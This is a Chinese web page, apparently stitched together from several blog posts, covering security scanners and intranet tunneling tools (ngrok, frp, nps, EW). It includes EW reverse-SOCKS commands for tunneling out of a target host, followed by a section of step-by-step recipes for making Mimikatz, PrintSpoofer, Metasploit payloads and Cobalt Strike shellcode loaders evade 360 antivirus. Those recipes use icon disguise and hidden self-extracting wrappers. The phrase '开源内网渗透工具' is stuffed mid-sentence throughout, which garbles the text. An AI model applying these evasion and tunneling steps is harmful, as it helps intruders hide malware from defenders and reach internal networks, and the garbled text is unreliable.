内网渗透工具包,开源内网渗透工具

本文目录一览：

• 1、常用的网络安全工具有哪些？
• 2、有没有简单的内网穿透工具？
• 3、有什么内网穿透工具
• 4、Ngrok有时很不稳定，有什么更好的内网穿透方法？
• 5、内网渗透-常用工具免杀
• 6、简单好用的的内网穿透（端口映射）工具有哪些？

常用的网络安全工具有哪些？

1、NMap

是一个开源且免费的安全扫描工具，可被用于安全审计和网络发现。能够工作在Windows、Linux、HP-UX、Solaris、BSD(包括Mac OS)、以及AmigaOS上。Nmap可用于探测网络中那些可访问的主机，检测它们操作系统的类型和版本，正在提供的服务，以及正在使用的防火墙或数据包过滤器的信息等。由于它既带有GUI界面，又提供命令行，因此许多网络与系统管理员经常将它运用到自己的日常工作中，其中包括：检查开放的端口，维护服务的升级计划，发现网络拓扑，以及监视主机与服务的正常运行时间等方面。

2、Wireshark

作为业界最好的工具之一，Wireshark可以提供免费且开源的渗透测试服务。通常，您可以把它当作网络协议分析器，以捕获并查看目标系统与网络中的流量。它可以在Linux、Windows、Unix、Solaris、Mac OS、NetBSD、FreeBSD、以及其他操作系统上运行。Wireshark广受教育工作者、安全专家、网络专业人员、以及开发人员的使用和喜爱。那些经由Wireshark还原的信息，可以被其图形用户界面(GUI)或TTY模式的TShark工具来查看。

3、Metasploit

作为一个安全项目，Metasploit可为用户提供有关安全风险或漏洞等方面的重要信息。该开源的框架可以通过渗透测试服务，让用户获悉各种应用程序、平台和操作系统上的最新漏洞，以及可以被利用的代码。从渗透测试角度来看，Metasploit可以实现对已知漏洞的扫描，侦听，利用，以及证据的收集。它提供可在Linux、Windows以及Apple Mac OS上运行的命令行和图形用户界面。虽然Metasploit是一种商业工具，但它附带有一个开源的有限试用版。

4、Netsparker

作为一款商业化的安全测试工具，Netsparker是一个精确、自动化且易用的Web应用安全扫描程序。该工具可以被用于自动化地识别Web应用服务中的跨站点脚本(XSS)和SQL注入等安全风险。通过基于证据的扫描技术，它不仅可以生成风险报告，还能够通过概念证明(Proof of Concept)，来确认是否有误报，并能减少手动验证漏洞的时间。

5、Acunetix

是一款全自动化的Web漏洞扫描程序。它可以智能地检测、识别并报告超过4500种Web应用漏洞，其中包括XSS XXE、SSRF、主机头部注入(Host Header Injection)和SQL注入的所有变体。作为一种商业工具，Acunetix通过其DeepScan Crawler来扫描重AJAX(AJAX-heavy)客户端类型的单页面应用(SPA)和HTML5网站。

6、Nessus

是针对安全从业人员的漏洞评估解决方案。它能够协助检测和修复各种操作系统、应用程序、乃至设备上的漏洞、恶意软件、配置错误、以及补丁的缺失。通过运行在Windows、Linux、Mac、Solaris上，用户可以用它来进行IP与网站的扫描，合规性检查，敏感数据搜索等测试。

7、W3af

作为一个免费工具，W3af是一个Web应用攻击和审计框架。它通过搜索、识别和利用200多种已知的Web应用漏洞，来掌控目标网站的总体风险。这些漏洞包括：跨站点脚本(XSS)、SQL注入、未处理的应用错误、可被猜测的密钥凭据、以及PHP错误配置等。W3af不但适用于Mac、Linux和Windows OS，而且提供控制台和图形用户界面。

8、Zed Attack Proxy

由OWASP开发的免费且开源的安全测试工具。它可以让您在Web应用中发现一系列安全风险与漏洞。由于支持Unix/Linux、Windows和Mac OS，即使您是渗透测试的新手，也能轻松地上手该工具。

9、Burpsuite

作为一个严控“入侵者”扫描工具，Burpsuite被部分安全测试专家认为：“如果没有它，渗透测试将无法开展。”虽然不是免费，但是Burpsuite提供丰富的功能。通常，人们可以在Mac OS X、Windows和Linux环境中使用它，以实现爬取内容和功能，拦截代理，以及扫描Web应用等测试目的。

10、Sqlninja

作为最好的开源渗透测试工具之一，Sqlninja可以利用Microsoft SQL Server作为后端，来检测Web应用上的SQL注入威胁和漏洞。该自动化测试工具提供命令行界面，可以在Linux和Apple Mac OS X上被使用。Sqlninja具有包括：对远程命令进行计数，DB指纹识别，及其检测引擎等描述性功能。

有没有简单的内网穿透工具？

1、Ngrok

ngrok 是一个反向代理，通过在公共端点和本地运行开源内网渗透工具的 Web 服务器之间建立一个安全的通道，实现内网主机的服务可以暴露给外网。ngrok 可捕获和分析所有通道上的流量，便于后期分析和重放，所以ngrok可以很方便地协助服务端程序测试。

参考博客：10分钟教开源内网渗透工具你搭建自己的ngrok服务器

2、Natapp

natapp是 基于ngrok的国内收费内网穿透工具，类似花生壳，有免费版本，比花生壳好。免费版本：提供http,https,tcp全隧道穿透，随机域名/TCP端口，不定时强制更换域名/端口，自定义本地端口

参考文章：NATAPP1分钟快速新手图文教程

3、小米球

小米球是基于ngrok二次开发的内网穿透工具，支持多协议、多隧道、多端口同时映射(http、https、tcp等等...)，同时支持多种系统win、linux、linux_arm、mac等。具体的使用直接参考官网。

4、Sunny-Ngrok

Sunny-Ngrok同样是ngrok二次开发的内网穿透工具，支持http,https协议，同时支持更丰富的系统和语言：linux、win、mac、openwrt、 python、php等。

教程：Sunny-Ngrok使用教程

5、echosite

echosite同样ngrok二次开发的内网穿透工具，支持多种协议，以前是全部免费的，现在推出了收费版和免费版，可根据自己的需要去选择。

参考教程：EchoSite---让内网穿透变得简单

6、Ssh、autossh

ssh 配合autossh工具使用，因为autossh会容错，自动重新启动SSH会话和隧道。autossh是一个程序，用于启动ssh的副本并进行监控，在死亡或停止传输流量时根据需要重新启动它。 这个想法来自rstunnel（Reliable SSH Tunnel），但是在C中实现。作者的观点是，它不像匆匆忙忙的工作那么容易。使用端口转发环路或远程回显服务进行连接监视。在遇到连接拒绝等快速故障时，关闭连接尝试的速度。在OpenBSD，Linux，Solaris，Mac OS X，Cygwin和AIX上编译和测试; 应该在其他BSD上工作。免费软件。

使用教程：SSH内网穿透

7、Lanproxy

lanproxy是一个将局域网个人电脑、服务器代理到公网的内网穿透工具，目前仅支持tcp流量转发，可支持任何tcp上层协议（访问内网网站、本地支付接口调试、ssh访问、远程桌面...）。目前市面上提供类似服务的有花生壳、TeamView、GoToMyCloud等等，但要使用第三方的公网服务器就必须为第三方付费，并且这些服务都有各种各样的限制，此外，由于数据包会流经第三方，因此对数据安全也是一大隐患。

参考教程：业余草推荐一款局域网（内网）穿透工具lanproxy

8、Spike

Spike是一个可以用来将你的内网服务暴露在公网的快速的反向代理，基于ReactPHP，采用IO多路复用模型。采用Php实现。

参考教程：使用 PHP 实现的的内网穿透工具 “Spike”

9、Frp

frp 是一个可用于内网穿透的高性能的反向代理应用，支持 tcp, udp, http, https 协议。利用处于内网或防火墙后的机器，对外网环境提供 http 或 https 服务。对于 http, https 服务支持基于域名的虚拟主机，支持自定义域名绑定，使多个域名可以共用一个80端口。利用处于内网或防火墙后的机器，对外网环境提供 tcp 和 udp 服务，例如在家里通过 ssh 访问处于公司内网环境内的主机。

教程：一款很好用的内网穿透工具--FRP、使用frp实现内网穿透

10、Fcn

FCN[free connect]是一款傻瓜式的一键接入私有网络的工具, fcn利用公共服务器以及数据加密技术实现：在免公网IP环境下，在任意联网机器上透明接入服务端所在局域网网段。支持多种系统，有免费版和付费版。

教程：内网穿透工具FCN介绍

上面便是我所知道的内网穿透工具，其中ngrok相关的我基本都用过还有frp，都差不多。大部分都可以免费去使用，但是我不建议大家把这些免费的穿透工具去放到比较重要的云服务器中去使用，容易被攻击。我的小伙伴，开始你的穿透之旅吧。

Proxy-Go 详细介绍

Proxy是golang实现的高性能http,https,websocket,tcp,udp,socks5代理服务器,支持正向代理、反向代理、透明代理、内网穿透、TCP/UDP端口映射、SSH中转、TLS加密传输、协议转换、DNS防污染代理。

Features

链式代理,程序本身可以作为一级代理,如果设置了上级代理那么可以作为二级代理,乃至N级代理。

通讯加密,如果程序不是一级代理,而且上级代理也是本程序,那么可以加密和上级代理之间的通讯,采用底层tls高强度加密,安全无特征。

智能HTTP,SOCKS5代理,会自动判断访问的网站是否屏蔽,如果被屏蔽那么就会使用上级代理(前提是配置了上级代理)访问网站;如果访问的网站没有被屏蔽,为了加速访问,代理会直接访问网站,不使用上级代理。

域名黑白名单，更加自由的控制网站的访问方式。

跨平台性,无论你是widows,linux,还是mac,甚至是树莓派,都可以很好的运行proxy。

多协议支持,支持HTTP(S),TCP,UDP,Websocket,SOCKS5代理。

TCP/UDP端口转发。

支持内网穿透,协议支持TCP和UDP。

SSH中转,HTTP(S),SOCKS5代理支持SSH中转,上级Linux服务器不需要任何服务端,本地一个proxy即可开心上网。

KCP协议支持,HTTP(S),SOCKS5代理支持KCP协议传输数据,降低延迟,提升浏览体验.

集成外部API，HTTP(S),SOCKS5代理认证功能可以与外部HTTP API集成，可以方便的通过外部系统控制代理用户。

反向代理,支持直接把域名解析到proxy监听的ip,然后proxy就会帮你代理访问需要访问的HTTP(S)网站。

透明HTTP(S)代理,配合iptables,在网关直接把出去的80,443方向的流量转发到proxy,就能实现无感知的智能路由器代理。

协议转换，可以把已经存在的HTTP(S)或SOCKS5代理转换为一个端口同时支持HTTP(S)和SOCKS5代理，转换后的SOCKS5代理不支持UDP功能,同时支持强大的级联认证功能。

自定义底层加密传输，http(s)\sps\socks代理在tcp之上可以通过tls标准加密以及kcp协议加密tcp数据,除此之外还支持在tls和kcp之后进行自定义加密,也就是说自定义加密和tls|kcp是可以联合使用的,内部采用AES256加密,使用的时候只需要自己定义一个密码即可。

底层压缩高效传输，http(s)\sps\socks代理在tcp之上可以通过自定义加密和tls标准加密以及kcp协议加密tcp数据,在加密之后还可以对数据进行压缩,也就是说压缩功能和自定义加密和tls|kcp是可以联合使用的。

安全的DNS代理，可以通过本地的proxy提供的DNS代理服务器与上级代理加密通讯实现安全防污染的DNS查询。

Why need these?

当由于安全因素或者限制,我们不能顺畅的访问我们在其它地方的服务,我们可以通过多个相连的proxy节点建立起一个安全的隧道,顺畅的访问我们的服务.

微信接口本地开发,方便调试.

远程访问内网机器.

和小伙伴一起玩局域网游戏.

以前只能在局域网玩的,现在可以在任何地方玩.

替代圣剑内网通，显IP内网通，花生壳之类的工具.

有什么内网穿透工具

内网穿透的话首选还是花生壳动态域名解析软件， 官网： 对于一般公司网管或者搞IT运维技术的应该都知道这个软件，尤其是内网用户需要实现内网服务外网访问，就需要有内网穿透功能。比如网络建站、远程监控、搭建FTP、VPN等，花生壳算是老品牌了，这么多年一直在做动态域名，用户量在国内算是最多的吧。

Ngrok有时很不稳定，有什么更好的内网穿透方法？

以下内容来自公众号逆锋起笔开源内网渗透工具，关注每日干货及时送达

原文开源内网渗透工具：v0w.top/2020/08/11/IntranetProxy

前言

本文以渗透的视角，总结几种个人常用的内网穿透，内网代理工具，介绍其简单原理和使用方法。

1、nps-npc1.1 简介

nps是一款轻量级、高性能、功能强大的内网穿透代理服务器。目前支持tcp、udp流量转发，可支持任何tcp、udp上层协议（访问内网网站、本地支付接口调试、ssh访问、远程桌面，内网dns解析等等……），此外还支持内网http代理、内网socks5代理、p2p等，并带有功能强大的web管理端。

一台有公网IP的服务器（VPS）运行服务端（NPS）

一个或多个运行在内网的服务器或者PC运行客户端（NPC）

1.2 特点

Go语言编写

支持跨平台

支持多种协议的代理

web管理端

1.3 使用方法

NPS

安装配置

找到自己服务器相应版本的server：

cd ~

wget

tar xzvf linux_amd64_server.tar.gz

cd ~/nps

在nps目录下面会有一个nps可执行文件、conf配置目录和web网页目录，开源内网渗透工具我们只需要修改conf/nps.conf即可：

vim conf/nps.conf

需要改一下#web下面的几个参数，

web_host= 服务器IP或者域名

web_username= admin（登录用户名）

web_password= 开源内网渗透工具你的密码

web_port=8080（web管理端口）

修改#bridge可以更改 NPC的连接端口。比如我们拿到一台权限受限的服务器，有防火墙，可能只有部分端口（80，443）可以出网，就需要修改成出网端口。

##bridge

bridge_type=tcp

bridge_port=443 # 修改连接端口

bridge_ip=0.0.0.0

启动

#Mac/Linux

./nps test|start|stop|restart|status 测试配置文件|启动|停止|重启|状态

#Windows

nps.exe test|start|stop|restart|status 测试配置文件|启动|停止|重启|状态

NPC

./npc -server=你的IP:8024 -vkey=唯一验证密码 -type=tcp

新建好客户端后，也可以在+中看到，详细的客户端连接命令：

在客户端界面可以通过新增的方式添加客户端连接，每一个连接的vkey都是唯一区分的。

每一个客户端，在建立连接后，都可以建立多个不同协议的隧道，这一个个隧道就是不同的代理了。

通过不同的协议和端口就可以连接代理的内网机器。

2、frp

2.1 简介

frp 是一个专注于内网穿透的高性能的反向代理应用，支持 TCP、UDP、HTTP、HTTPS 等多种协议。可以将内网服务以安全、便捷的方式通过具有公网 IP 节点的中转暴露到公网。

2.2 特点

客户端服务端通信支持 TCP、KCP 以及 Websocket 等多种协议。

端口复用，多个服务通过同一个服务端端口暴露。

跨平台，但是支持的比nps少一点

多种插件，提供很多功能

2.3 使用方法

下载：

以下内容摘自：. 通过 rdp 访问家里的机器

1.修改 frps.ini 文件，为了安全起见，这里最好配置一下身份验证，服务端和客户端的 common 配置中的token参数一致则身份验证通过：

# frps.ini

[common]

bind_port = 7000

# 用于身份验证，请自行修改，要保证服务端与客户端一致

token = abcdefgh

2.启动 frps：

./frps -c ./frps.ini

3.修改 frpc.ini 文件，假设 frps 所在服务器的公网 IP 为 x.x.x.x：

# frpc.ini

[common]

server_addr = x.x.x.x

server_port = 7000

# 用于身份验证，请自行修改，要保证服务端与客户端一致

token = abcdefgh

[rdp]

type = tcp

local_ip = 127.0.0.1

local_port = 3389

remote_port = 6000

4.启动 frpc：

./frpc -c ./frpc.ini

5.通过 rdp 访问远程的机器，地址为：

x.x.x.x:6000

开机自启

针对 Windows 系统，为了便于使用，可以配置一下开机的时候静默启动。

1.在 frpc.exe 的同级目录创建一个 start_frpc.vbs：

'start_frpc.vbs

'请根据实际情况修改路径

CreateObject("WScript.Shell").Run """D:\Program Files\frp_windows_amd64\frpc.exe""" "-c" """D:\Program Files\frp_windows_amd64\frpc.ini""",0

2.复制 start_frpc.vbs 文件，打开以下目录，注意将

改为你的用户名：

C:\Users\\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup

3.鼠标右击，粘贴为快捷方式即可。

2. 通过 SSH 访问公司内网机器

frps 的部署步骤同上。

1.启动 frpc，配置如下：

# frpc.ini

[common]

server_addr = x.x.x.x

server_port = 7000

# 用于身份验证，请自行修改，要保证服务端与客户端一致

token = abcdefgh

[ssh]

type = tcp

local_ip = 127.0.0.1

local_port = 22

remote_port = 6000

2.通过 SSH 访问内网机器，假设用户名为 test：

ssh -oPort=6000 test@x.x.x.x

3. 通过自定义域名访问部署于内网的 Web 服务

1.修改 frps.ini 文件，设置 http 访问端口为 8080：

# frps.ini

[common]

bind_port = 7000

vhost_http_port = 8080

# 用于身份验证，请自行修改，要保证服务端与客户端一致

token = abcdefgh

2.启动 frps：

./frps -c ./frps.ini

3.修改 frpc.ini 文件，假设 frps 所在的服务器的 IP 为 x.x.x.x，local_port 为本地机器上 Web 服务对应的端口， 绑定自定义域名:

# frpc.ini

[common]

server_addr = x.x.x.x

server_port = 7000

# 用于身份验证，请自行修改，要保证服务端与客户端一致

token = abcdefgh

[web]

type = http

local_port = 80

custom_domains =

4.启动 frpc：

./frpc -c ./frpc.ini

5 .将的域名 A 记录解析到 IPx.x.x.x，如果服务器已经有对应的域名，也可以将 CNAME 记录解析到服务器原先的域名。

6.通过浏览器访问即可访问到处于内网机器上的 Web 服务。

4. 对外提供简单的文件访问服务

通过static_file插件可以对外提供一个简单的基于 HTTP 的文件访问服务。

frps 的部署步骤同上。

1.启动 frpc，启用static_file插件，配置如下：

# frpc.ini

[common]

server_addr = x.x.x.x

server_port = 7000

# 用于身份验证，请自行修改，要保证服务端与客户端一致

token = abcdefgh

[test_static_file]

type = tcp

remote_port = 6000

plugin = static_file

# 要对外暴露的文件目录

plugin_local_path = /tmp/file

# 访问 url 中会被去除的前缀，保留的内容即为要访问的文件路径

plugin_strip_prefix = static

plugin_http_user = abc

plugin_http_passwd = abc

2.通过浏览器访问来查看位于/tmp/file目录下的文件，会要求输入已设置好的用户名和密码。

常用功能

统计面板（Dashboard）

通过浏览器查看 frp 的状态以及代理统计信息展示。

注：Dashboard 尚未针对大量的 proxy 数据展示做优化，如果出现 Dashboard 访问较慢的情况，请不要启用此功能。

需要在 frps.ini 中指定 dashboard 服务使用的端口，即可开启此功能：

[common]

dashboard_port = 7500

# dashboard 用户名密码，默认都为 admin

dashboard_user = admin

dashboard_pwd = admin

打开浏览器通过http://[server_addr]:7500访问 dashboard 界面，用户名密码默认为admin。

加密与压缩

这两个功能默认是不开启的，需要在 frpc.ini 中通过配置来为指定的代理启用加密与压缩的功能，压缩算法使用 snappy：

# frpc.ini

[ssh]

type = tcp

local_port = 22

remote_port = 6000

use_encryption = true

use_compression = true

如果公司内网防火墙对外网访问进行了流量识别与屏蔽，例如禁止了 SSH 协议等，通过设置use_encryption = true，将 frpc 与 frps 之间的通信内容加密传输，将会有效防止流量被拦截。

如果传输的报文长度较长，通过设置use_compression = true对传输内容进行压缩，可以有效减小 frpc 与 frps 之间的网络流量，加快流量转发速度，但是会额外消耗一些 CPU 资源。

[TLS

从 v0.25.0 版本开始 frpc 和 frps 之间支持通过 TLS 协议加密传输。通过在frpc.ini的common中配置tls_enable = true来启用此功能，安全性更高。

为了端口复用，frp 建立 TLS 连接的第一个字节为 0x17。

注意：启用此功能后除 xtcp 外，不需要再设置 use_encryption。

代理限速

目前支持在客户端的代理配置中设置代理级别的限速，限制单个 proxy 可以占用的带宽。

# frpc.ini

[ssh]

type = tcp

local_port = 22

remote_port = 6000

bandwidth_limit = 1MB

在代理配置中增加bandwidth_limit字段启用此功能，目前仅支持MB和KB单位。

范围端口映射

在 frpc 的配置文件中可以指定映射多个端口，目前只支持 tcp 和 udp 的类型。

这一功能通过range:段落标记来实现，客户端会解析这个标记中的配置，将其拆分成多个 proxy，每一个 proxy 以数字为后缀命名。

例如要映射本地 6000-6005, 6007 这 6 个端口，主要配置如下：

# frpc.ini

[range:test_tcp]

type = tcp

local_ip = 127.0.0.1

local_port = 6000-6006,6007

remote_port = 6000-6006,6007

实际连接成功后会创建 8 个 proxy，命名为test_tcp_0, test_tcp_1 ... test_tcp_7。

3、ew3.1 简介

EW 是一套便携式的网络穿透工具，具有 SOCKS v5服务架设和端口转发两大核心功能，可在复杂网络环境下完成网络穿透。但是，现在工具已经不更新了。。。

3.2 特点

轻量级，C语言编写

可以设置多级代理

跨平台

但是只支持Socks5代理

3.3 使用方法以下使用方法均摘自：

以下所有样例，如无特殊说明代理端口均为1080，服务均为SOCKSv5代理服务.

该工具共有 6 种命令格式（ssocksd、rcsocks、rssocks、lcx_slave、lcx_listen、lcx_tran）。

1. 正向 SOCKS v5 服务器

$ ./ew -s ssocksd -l 1080

2. 反弹 SOCKS v5 服务器

这个操作具体分两步：

a) 先在一台具有公网 ip 的主机A上运行以下命令：

$ ./ew -s rcsocks -l 1080 -e 8888

b) 在目标主机B上启动 SOCKS v5 服务 并反弹到公网主机的 8888端口

$ ./ew -s rssocks -d 1.1.1.1 -e 8888

成功。

3. 多级级联

工具中自带的三条端口转发指令， 它们的参数格式分别为：

$ ./ew -s lcx_listen -l 1080 -e 8888

$ ./ew -s lcx_tran -l 1080 -f 2.2.2.3 -g 9999

$ ./ew -s lcx_slave -d 1.1.1.1 -e 8888 -f 2.2.2.3 -g 9999

通过这些端口转发指令可以将处于网络深层的基于TCP的服务转发至根前,比如 SOCKS v5。首先提供两个“二级级联”本地SOCKS测试样例：

a)lcx_tran的用法

$ ./ew -s ssocksd -l 9999

$ ./ew -s lcx_tran -l 1080 -f 127.0.0.1 -g 9999

b)lcx_listen、lcx_slave的用法

$ ./ew -s lcx_listen -l 1080 -e 8888

$ ./ew -s ssocksd -l 9999

$ ./ew -s lcx_slave -d 127.0.0.1 -e 8888 -f 127.0.0.1 -g 9999

再提供一个“三级级联”的本地SOCKS测试用例以供参考

$ ./ew -s rcsocks -l 1080 -e 8888

$ ./ew -s lcx_slave -d 127.0.0.1 -e 8888 -f 127.0.0.1 -g 9999

$ ./ew -s lcx_listen -l 9999 -e 7777

$ ./ew -s rssocks -d 127.0.0.1 -e 7777

数据流向:SOCKS v5 - 1080 - 8888 - 9999 - 7777 - rssocks

4、ngrok4.1 简介

4.2 特点

官方维护，一般较为稳定

跨平台，闭源

有流量记录和重发功能

4.3 使用方法

进入ngrok官网（），注册ngrok账号并下载ngrok开源内网渗透工具；

根据官网给定的授权码，运行如下授权命令；

./ngrok authtoken 1hAotxhmORtzCYvUc3BsxDBPh1H_******************

./ngrok http 80即可将机器的80端口http服务暴露到公网，并且会提供一个公网域名。

可以通过官网的UI界面查看数据包和流量等等（但是要付费==、）

还可以通过一些命令将内网的文件和其他TCP服务 暴露到公网中。

有授权的设置文件共享

ngrok http -auth="user:password"

无授权的设置文件共享

ngrok http ":\\Users\\alan\\Public Folder"

将主机的3389的TCP端口暴露到公网

ngrok tcp 3389

更多使用方法参考：

内网渗透之内网穿透

开源内网穿透工具 frp 简单使用教程

内网渗透-常用工具免杀

Mimikatz其实并不只有抓取口令这个功能，它还能够创建票证、票证传递、hash传递、甚至伪造域管理凭证令牌等诸多功能。由于mimikatz开源内网渗透工具的使用说明网上资料很多，这里就不多加介绍开源内网渗透工具了，随着这两年hw行动越来越多，企事业单位也都开始注重内网安全，有预算开源内网渗透工具的会上全套的终端安全、企业版杀软或者EDR，就算没有预算的也会装个360全家桶或者主机卫士之类的，这也导致很多时候开源内网渗透工具你的mimikatz可能都没法拷贝过去或者没有加载执行，拿开源内网渗透工具了台服务器却横向移不动就尴尬了。因为这款工具特别出名所以被查杀的机率很大， 我们可以通过 github 上的开源代码对其进行源码免杀从而 bypass 反病毒软件。

Mimikatz 源代码下载

免杀步骤

替换 mimikatz 关键字 shenghuo

mimikatz 下的文件全部改为 shenghu

把项目里所有的文件注释去掉

/_ Benjamin DELPY gentilkiwi benjamin@gentilkiwi.com Licence : _/

打开红色框框内的内容，替换图标文件

出现 无法找到 v140 的生成工具(平台工具集 =“v140”)，要选择自己安装的平台工具集

重新生成

生成的程序能够正确运行

成功过360

PrintSpoofer做免杀

printspoofer提权工具目前主流的提权工具之一，360 安全会自动查杀，其他杀毒软件并不会查杀。

源码下载地址：

将PrintSpoofer.cpp 里面的输出帮助文档全部清空

导入图标

重新生成，程序生成成功

成功过360

metasploit 是一款开源的安全漏洞检测工具，同时Metasploit 是免费的工具，因此安全工作人员常用 Metasploit 工具来检测系统的安全性。Metasploit Framework (MSF) 在 2003 年以开放源码方式发布，是可以自由获取的开发框架。 它是一个强大的开源平台，供开发，测试和使用恶意代码，这个环境为渗透测试、 shellcode 编写和漏洞研究提供了一个可靠平台。其中攻击载荷模块(Payload) ， 在红队中是个香饽饽，使用这个模块生成的后门，不仅支持多种平台，而且 Metasploit 还有编码器模块(Encoders)，生成后门前，对其进行编码转换，可以混 淆绕过一部分杀毒软件。

工具 Dev-Cpp 5.11 TDM-GCC 4.9.2 Setup 下载地址

metasploit源码下载：metasploit-loader/master/src/main.c

选择：文件-新建项目-consoleApplication-c 项目

把winsock2.h 移动到windows.h 上 不然编译会出错。

将这四处的数字改为其他数字

设置攻击载荷,执行后成功上线

成功过360

生成python64位的shellcode

添加生成的shellcode

编译成程序

pyinstaller -F test.py —noconsole

此时还要做的就是更改图标，这里介绍一种方法

首先右击它，选择“添加到压缩文件”

在弹出来的一个“压缩文件名和参数”框中设置压缩文件格式为“ZIP”,压缩方式为“存储”，压缩选项为“创建自解压格式压缩文件”。

随后选择“高级”选项卡。选择了“高级”选项卡以后直接点击“自解压选项”

在设置选项卡中解压后运行对应程序

在模式选项卡中选择解压临时文件夹和全部隐藏

随后再选择“更新”选项卡，在覆盖方式中选择“覆盖所有文件”

最后选择“文本和图标”选项卡，在自定义自解压文件徽标和图标中选择“从文件加载自解压文件图标”，点击“浏览”，找到自己想要加载的图标文件后并打开

然后就点击确定（两次）就可以生成一个新的exe程序了。图标已经改变了，再运行测试一下

上传去目标主机，这里更改了程序名称

在线查杀

是很流行的编程语言，也可以用它来做一个加载器运行cobaltstrike的 shellcode，生成出来的 文件特别的小，可以很好地投递传输。

项目地址 用 vs2017 打开 sln 项目文件

选择 xorkryptor 生成编码器 用 cobalt strike生成 raw 二进制文件

encrypt.bin 就是经过编码后的文件

项目里面存有 Rsources 和 encrypt.bin 文件 事实上项目是没有这个文件夹和文 件所以在当前目录新建文件夹和将生成好的shellcode文件 encrypt.bin 复制到文 件夹里。右键选择编译文件即可。

此时文件正常

重新编译，成功生成后门程序

成功过360

成功上线

简单好用的的内网穿透（端口映射）工具有哪些？

实际工作和生活中，常常遇到以下问题：如何让任何地方都能访问自己家里的笔记本上的应用？如何让局域网的服务器可以被任何地方访问到？如何在异地远程处理公司服务问题；企业员工如何在异地访问公司内网财务/管理系统，可以随时上传下载文档等；对于没有公网 IP 的用户来说，远程管理或在wai网访问内网机器上的服务是一个问题，有很多类似的需求；个人开发者程序员，对微信公众号小程序也需要开发调试等，那么这些问题有什么解决方案呢？

同类型的问题有很多，但是也有简单解决的方法。大多部分用户无非是没有公网ip，也没有时间自己去搭建一款类似的软件，网上有很多开源的，测试后也很不尽人意。

了解的内网穿透工具

小蚂蚁

网云穿

闪库

小蚂蚁

小蚂蚁是之前用过的一款工具，是国内软件，自主开发的。支持所有基于TCP、UDP协议的应用及协议，包括HTTP、SSH、SMTP、GIT、MYSQL等，类似于国内的花生壳，有免费版和收费版本，wai网端口自定义分配，不可修改，免费的可以一直用，不过过段时间要激活。付费的可支持所有协议，且不限制流量的使用。

网云穿

也是测试过的一款国内自主研发软件，直接对外发布应用, 映射转发本地socket端口, wai网直接访问, 支持HTTPS协议以及SSL证书, 支持异常流量过滤.支持FTP、SVN、管家婆、金碟、ERP、视频监控等所有应用!均有免费版与付费版，自己测试即可。

软件截图：

请点击输入图片描述

闪库

这个也是软件他是可以私有部署在服务器，比较方便，免费版是个人测试远程桌面，基本够用了。带宽也比较高10mbps，隧道采用的是双向加密传输的，全协议支持 ，提供公网ip。

软件截图：

请点击输入图片描述

总体来说，这几款国内软件使用都有利有弊，日常个人开发调试，展示网站完全够用，如果用于正式发布，企业使用还是建议使用专业版和商业版，会更加稳定。带宽也能跟上！